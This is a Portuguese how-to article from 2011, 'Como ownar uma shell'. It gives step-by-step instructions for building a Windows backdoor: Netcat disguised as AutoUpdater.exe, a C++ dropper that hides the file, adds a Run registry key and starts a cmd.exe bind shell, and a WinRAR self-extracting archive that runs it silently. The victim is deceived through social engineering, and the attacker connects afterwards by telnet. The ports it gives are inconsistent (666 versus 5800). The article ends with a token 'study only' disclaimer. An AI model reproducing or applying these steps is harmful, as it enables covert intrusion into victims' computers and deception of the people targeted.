Como ownar uma shell

Por GLG Contributor , December 26, 2011
Como ownar uma shell
Como ownar uma shell

É uma técnica muito simples porém foi aprimorada com o uso do aplicativo Winrar que é um programa similar ao aplicativo Winzip que tem a função de compactar arquivos (trabalha cono compressor dew arquivos) de forma que em alguns casos seu tamanho seja reduzido de forma significativa

Este método é possível obter uma shell remota.


São necessários para esta tarefa os seguintes aplicativos:

Winrar;
Netcat - programa que não possui interface gráfica, após executado exibe uma janela de prompt. Este programa é considerado um “canivete suíço”, pois apesar de sua simplicidade possui muitas funcionalidades.
Compilador de programas para linguagem C++ (recomendação Blood Shed Dev C++). Mas o que um compilador faz?
Na verdade se você cria um código qualquer, indiferente da linguagem, este código não executa sem ser compilado, ou seja é necessário dar vida a este programa torná-lo um arquivo executável.
Necessário que o leitor saiba os procedimentos básicos para compilar o código em C++.

Instruções

  1. 1
    O netcat será o backdoor que será compactado com o código já compilado para a vítima. Este código em C++ será o responsável por burlar o sistema antivírus da vítima.


    Primeiramente você já deverá ter em mente o que chamam de engenharia social, que consiste em enganar a vítima para que clique sobre o aplicativo enviado.

    Você deverá fazer uma cópia do aplicativo Netcat e renomeá-lo para um nome bem sugestivo acima de qualquer suspeita, como por exemplo : AutoUpdater.exe, o que dá a impressão acompanhado de boa engenharia social, um simples aplicativo de atualização.
  2. 2
    Feito isso o passo seguite é criar o código em C++.
    Abra o bloco de notas e cole ou digite o seguinte código:


    #include
    #include
    int main(void) {
    system("@echo off");
    system("@break off");
    system("@Copy AutoUpdater.exe C:\Windows
    repair");
    system("@del AutoUpdater.exe");
    system("@cd C:\Windows\repair");
    system("@attrib +h AutoUpdater.exe");
    system("@Reg Add HKLM\Software\Microsoft
    Windows\CurrentVersion \Run /v WinUpdate /t
    REG_SZ /d "Start
    C:\Windows\repair\AutoUpdater.exe -d -L -t -
    p666 -e cmd.exe");
    system("Start C:\Windows\repair
    AutoUpdater.exe -d -L -t -p666 -e cmd.exe");
    return 0;
    }


    Feito isto salve o arquivo como h4x0r.c
  3. 3
    Para compilar este código abra-o com o aplicativo Blood Sheed, depois clique Executar ---Compilar (Execute---Compile), será gerado um arquivo executável com o mesmo nome (h4x0r).


    Utilizaremos o Winrar para juntarmos os arquivos (joiner).
    Inicie o Winrar clique em Comandos---- Adicionar arquivos para compressão.

    Clique não opção Criar um arquivo SFX e dê um nome para este arquivo, perceba que é gerado um outro arquivo com a extensão exe.
    Ainda no Winrar clique na aba arquivos---Anexar para importar arquivos AutoUpdater.exe e h4x0r.exe.

    Agora na guia Avançado clique em Opções de SFX, no caminho de extração do arquivo coloque C:.

    Selecione a opção Salvar e restaurar arquivo.
    No campo executar após extração digite o nome do seguinte aplicativo : h4x0r.exe.

    Perceba que há uma guia no aplicativo com o rótulo de Métodos e selecione as opções Ocultar tudo e substituir todos os arquivos.



    Clique sobre a guia Texto e ícone e selecione um arquivo de ícone para modificar o ícone padrão (default) do Winrar.

    Para gerar o arquivo basta clicar nos dois botões de OK que aparecem no aplicativo.

    Note que o aplicativo foi gerado com o ícone que você escolheu.
    Agora utilizando o Winrar compacte este executável que ficará com a seguinte extensão : nome_do_seu_arquivo.rar. O seu backdoor está pronto para ser enviado a vítima.
  4. 4
    Engenharia social

    Esta etapa do processo você deverá utilizar sua lábia para enviar o arquivo a vítima e convencê-la a clicar, tem que criar uma história bem convincente.
    Lembre-se de quando estiver enviando o arquivo, no meio da transferência deverá digitar dentro do prompt de comando do Windows : netstat -n ( com isso é possível capturar a grosso modo o número ip da máquina a ser ownada).
    Ainda utilizando a boa e velha engenharia social pergunte a pessoa se recebeu o arquivo e o executou, se disser que sim você digita no prompt de comando:

    Telnet ip_da_vítima 5800

    O número 5800 é um número das mais de 65000 portas que o computador possui.

    Isso não quer dizer que você deverá utilizar esta porta como regra, pode utilizar outras. Importante que você saiba que uma porta que está em uso por algum outro processo não é possível retornar informação alguma ou conseguir conectar.
  5. 5
    Considerações finais

    O aplicativo Winrar trabalha como um Joiner que no mundo dos hackers é um aplicativo responsável por mesclar um ou mais arquivos a um programa malicioso como por exemplo spyware ou trojans.


    O Winrar em mãos erradas pode ser letal principalmente quando usuários totalmente leigos baixam aplicativos de sites ou servidores suspeitos.
    Pois há um recurso no próprio aplicativo para facilitar a extração do arquivo é utilizado para extrair o arquivo malicioso sem que o usuário perceba, pois é extraído de forma simultânea dependendo da configuração.


    O procedimento aqui descrito é apenas objeto de estudo, cada um utiliza o conhecimento que adquire da maneira que achar melhor.
    Enviar aplicativos maliciosos a computadores empresariais ou domésticos é considerado crime e também roubar dados pessoais de outras pessoas.

Related HowTos